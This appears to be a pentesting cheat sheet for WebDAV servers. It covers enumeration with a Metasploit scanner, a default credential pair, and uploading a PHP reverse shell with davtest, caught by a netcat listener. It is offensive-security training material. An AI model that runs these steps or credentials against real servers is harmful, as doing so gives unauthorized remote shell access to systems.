# WebDAV Pentesting

WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
msfconsole
msf> use auxiliary/scanner/http/webdav_scanner
```

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```
wampp:xampp
```

### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

#### 1. Check if the exploit can be uploaded <a href="#id-1-check-if-the-exploit-can-be-uploaded" id="id-1-check-if-the-exploit-can-be-uploaded"></a>

```
davtest -url http://example.com/davdir -auth 'user:pass'
```

#### 2. Upload the Reverse Shell Script <a href="#id-2-upload-the-reverse-shell-script" id="id-2-upload-the-reverse-shell-script"></a>

If we can upload the file e.g. PHP file, upload the script for reverse shell.

```
davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php
```

#### 3. Get a Shell <a href="#id-3-get-a-shell" id="id-3-get-a-shell"></a>

In local machine, start listener for getting a shell.

```
nc -lvnp 4444
```

Now access to <http://example.com/davdir/shell.php.\\>
We should get a shell.

```shellscript
davtest -cleanup -url http://target
cadaver http://target
```